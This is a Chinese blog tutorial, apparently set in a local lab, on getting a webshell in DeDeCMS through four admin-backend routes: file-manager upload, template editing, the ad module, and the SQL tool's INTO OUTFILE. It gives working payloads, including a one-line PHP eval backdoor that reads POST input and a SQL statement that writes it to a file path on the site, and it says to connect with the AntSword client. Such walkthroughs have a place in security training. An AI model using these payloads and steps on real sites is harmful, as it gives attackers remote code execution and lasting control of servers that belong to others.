CMS漏洞-DeDeCMS篇

一.姿势一:通过⽂件管理器上传WebShell

1.首先我们搭建网站然后进行登录

2.模块👉文件管理器👉文件上传

3.新建一个1.php文件,内容为:

<?php phpinfo();?>

选择1.php文件上传

4.访问网站根目录下的1.php,发现代码成功执行,说明我们的木马上传成功!!

二.姿势二:修改模板文件拿WebShell

1.模板👉默认模板管理👉index.htm👉修改

2.插入代码:

<?php phpinfo();?>并保存

3.生成👉更新主机html,主页位置修改为index.php,生成静态,更新主页html

4.访问主页,发现主页为phpinfo界面,说明我们植入的代码有效!

三.姿势三:后台任意命令执⾏拿WebShell

1.模块👉广告管理

在内容上写入代码:

<?php phpinfo();?>

2.上传成功后查看代码,并复制引号内容

3.访问后发现页面无回显

4.现在我们将代码换为一句话木马:

<?php @eval($_POSTcmd);?>

5.跟上述步骤一样复制引号内容并访问

6.使用蚁剑连接,连接成功!!

说明木马成功植入

四.姿势四:通过后台sql命令执⾏拿webshell

1.系统👉sql命令行工具

在命令行输入select @@basedir;

获取mysql路径,由此猜测⽹站绝对路径

2.在命令行输入:

select '<?php @eval($_POSTcmd);?>' into outfile 'D:/phpstudy_pro/WWW/dedecms/uploads/webshell.php'

上传一句话木马到webshell.php文件

3.我们在网站根目录下发现了webshell.php文件,内容为一句话木马

4.我们访问木马文件并复制其绝对路径

5.连接成功!

木马植入成功!

相关推荐
qetfw18 分钟前
CentOS 7 配置 iptables 防火墙
安全
磐链科技30 分钟前
区块链链游安全警示:常见漏洞与攻击手段
安全·区块链
数据知道2 小时前
HTTP/HTTPS 安全深度剖析:抓包、解密与证书陷阱
安全·http·https·mitmproxy·抓包解密
AI创界者2 小时前
安全测试环境搭建:在 Kali Linux 中部署与配置开源 WebShell 管理工具 AntSword(蚁剑)
linux·运维·安全
深盾科技_Virbox4 小时前
软件授权工具静默安装实践
java·运维·数据库·安全·软件需求
এ慕ོ冬℘゜4 小时前
前端核心知识体系进阶:从安全机制、网络协议到原生 JS 实战全解析
前端·网络协议·安全
延凡科技5 小时前
延凡科技综合监控预警处置平台—— 一体化视频AI安防闭环系统设计与功能实现[特殊字符]️
数据库·人工智能·科技·安全·能源
Amy187021118235 小时前
筑牢算力底座的安全防线:直流绝缘监测如何为固态变压器保驾护航
安全
HackTwoHub5 小时前
AI大模型攻击思路,涵盖提示词劫持、知识库投毒、多语种混淆 + 身份伪装、诱导 AI 输出涉密后台核心配置
人工智能·安全·web安全·网络安全·自动化·系统安全·安全架构
雁鸣零落5 小时前
浏览器扩展 CaptionGo,在网页视频上显示双语字幕,支持 PC 和手机端使用
android·chrome·edge·firefox·安卓